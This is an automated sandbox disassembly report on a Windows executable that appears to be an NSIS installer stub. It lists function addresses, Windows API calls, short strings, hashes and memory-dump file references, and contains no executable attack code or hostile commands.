Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
SetClassLongW.USER32(?,000000F2,?), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
GetDlgItem.USER32(?,00000003), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
EnableWindow.USER32(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00404695 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
GetDlgItem.USER32(?,000003E8), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

N, xrefs: 00404831

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
wsprintfA.USER32 ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

[Rename], xrefs: 00406286, 00406298
%ls=%ls, xrefs: 00406212

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00406594 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,00428E20,759223A0), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040675E
lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,00428E20,759223A0), ref: 004067B8

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-730719616
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Uniqueness

Uniqueness Score: -1.00%

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040455A
GetSysColor.USER32(00000000), ref: 00404598
SetTextColor.GDI32(?,00000000), ref: 004045A4
SetBkMode.GDI32(?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Uniqueness

Uniqueness Score: -1.00%

Function 004055DC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042BA48,00000000,00428E20,759223A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,759223A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406805 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,0043F000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,0043F000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

*?|<>/":, xrefs: 00406857
C:\Users\user\AppData\Local\Temp\, xrefs: 00406806

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1201062745
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(0000C6D7,00000064,?), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
